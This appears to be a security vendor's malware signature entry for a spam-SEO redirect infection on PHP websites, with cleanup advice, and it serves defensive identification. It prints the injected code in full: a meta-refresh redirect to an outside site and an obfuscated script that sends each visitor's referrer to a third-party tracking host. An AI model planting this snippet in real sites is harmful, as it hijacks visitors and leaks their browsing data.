Malware Signatures

  1. Home
  2. Malware Signatures
  3. html.spam-seo.redirect.002

html.spam-seo.redirect.002

Blackhat SEO, or spam-seo, is a malicious technique used to manipulate the search engine results in order to benefit a website in terms of relevance.
The payload is HTML based, thus intended for client-side use and the payload is executed after the infected page is loaded directly in the browser.
This malware redirects the user to a malicious site and uses a third-party service to generate statistics

Affecting

Any PHP based web site (often through outdated WordPress, Joomla, osCommerce, Magento, Drupal and stolen passwords).

Cleanup

Cleanup is done by deleting the malicious code from the file, or replacing it with a fresh version. The infection can be found in your system by searching for the malicious string inside your files.
You can also sign up with us and let our team remove the malware for you.

Dump


<html>
<head> <meta http-equiv="refresh" content="1; url=http://1worlddate.com/">
</head>
<script type="text/javascript">
a = "stat";
b = "run";
r = Math.floor(Math.random() * 10000); l = "http://img." + a + "-" + b + ".info/emptya2.gif?i=" + r + "&r=" + document.referrer; document.write("<img src='" + l + "'>");
</script>
<body>
<h1>Loading...</h1>
</body>
</html>